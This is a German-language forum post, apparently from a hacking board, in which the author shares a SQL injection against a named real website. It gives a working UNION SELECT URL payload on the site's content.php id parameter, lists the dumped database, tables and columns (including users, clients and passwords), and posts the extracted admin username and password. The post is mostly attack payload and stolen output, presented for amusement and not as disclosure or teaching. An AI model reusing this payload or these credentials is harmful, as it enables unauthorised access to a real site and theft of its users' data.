Hier mal ne SQLi - Ich hab die nicht deswegen gepostet weil da was besonderes drinnen ist, sonder weil der ansatz witzig war und "schwieriger" zu bewerkstelligen war.
Vulnerable Collumn: 3
MySQL Version: <5
DBs: information_schema,bluemonkeycms-
Current DB: bluemonkeycms-
Tables: admin,clients,content,events,files,gallery,gallery_cat,home,modlink,modules,news,newsletters,prj_categories,project,projects,subscribers,users,vehicles -http://www.reaplasrack.co.uk/content.php?id=-129%20union%20all%20select%201,2,group_concat%28table_name%29,4,5,6,7,8%20from%20information_schema.tables%20where%20table_schema=database%28%29--
Collumns: id,name,password,clientid,clientname,email,username,password,hdrallow,hdrwidth,hdrheight,id_content, title,content,clientid,cssfile,parent,parentid,hdrfile,id_news,start_date,end_date,headline,teaser,content,clientid,filename,id, filename,description,clientid,id_gallery,id_gallery_cat,filename,caption,description,clientid,alturl,id_gallery_cat,gallery_name, clientid,gallery_description,id_home,title,content,ID,clientid,modid,module_id,mod_txt,mod_url,active,id_news,start_date,end_date, headline,teaser,content,clientid,filename,id,clientid,content,headline,category_id,category_name,category_desc,client_id,id,name, description,cat_id,id_news,start_date,end_date,headline,teaser,content,clientid,filename,category_id,id,name,emailaddress,clientid, username,password,accesslevel,id_users,id,veh_type,veh_desc,veh_make,veh_model,veh_spec,veh_body,veh_engine,veh_transmission, veh_reg,veh_owners,veh_mileage,veh_history,veh_fuel,veh_price,image1,image2,image3,image4 -
Admin Table User and Pass: 1:admin:admin:-